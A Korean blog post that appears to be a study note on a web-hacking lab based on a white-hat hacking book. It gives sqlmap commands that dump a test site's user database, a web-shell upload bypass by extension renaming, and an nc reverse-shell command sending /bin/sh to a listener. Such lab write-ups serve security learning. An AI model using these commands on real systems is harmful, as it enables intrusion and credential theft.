최종 실습
1. 정보 수집
- 파라미터 값이 달라지는 것을 발견
2. SQL 인젝션 공격
- ‘을 입력했을 때 SQL 형식 관련 에러가 발생하는 것을 볼 수 있음
sqlmap -u “http://192.68.37.133/cat.php?id=1’ |
- 위 명령어를 통해 sqlmap을 실행시켜 인젝션 공격이 가능한 부분을 탐색, 굵게 표시된 부분을 보니 id 파라미터가 들어가는 곳이 취약
- sql 인젝션 공격과 xss 공격이 가능한 것을 확인
sqlmap -u "http://192.168.37.133/cat.php?id=1" --current-db |
- 현재 DB의 이름을 알아내고,
sqlmap -u "http://192.168.37.133/cat.php?id=1" -D photoblog --dump |
- DB 내용을 덤프시키고, USER 테이블로부터 사용자 정보를 획득
3. 파일 업로드 공격
- 위에서 획득한 정보를 통해 로그인
- New picture에서 [add]를 통해 webshell.php를 업로드 해봤으나 실패
mv webshell.php webshell.PHP |
- 웹쉘 확장자명을 바꿔서 업로드 성공
- HOME에서 페이지 소스 보기를 클릭하고 쉘이 올라간 경로를 찾음, 그 경로에 접속
- 웹쉘에 표시된 폼을 통해 정보 획득
4. 리버스 쉘 침투
nc -lvnp 4000 |
- 터미널 하나에 리스닝 포트 열어두기
nc 1922.168.37.130 4000 -e /bin/sh |
- 웹 쉘에 해당 명령어 입력하면 리스닝 포트에서 접속이 이루어진 것을 확인할 수 있음
해당 포스팅은 '화이트해커를 위한 웹 해킹의 기술' 책 내용을 바탕으로 작성되었습니다.
'보안' 카테고리의 다른 글
Chapter 17. 자바 역직렬화 취약점 공격 (0) | 2019.03.14 |
---|---|
Chapter 16. 알려진 취약점을 이용한 공격 (0) | 2019.03.14 |
Chapter 15. XXE 공격 (0) | 2019.03.14 |
Chapter 14. 접근 통제 취약점 공격 (0) | 2019.03.05 |
Chapter 13. 민감한 데이터 노출 (0) | 2019.03.04 |
댓글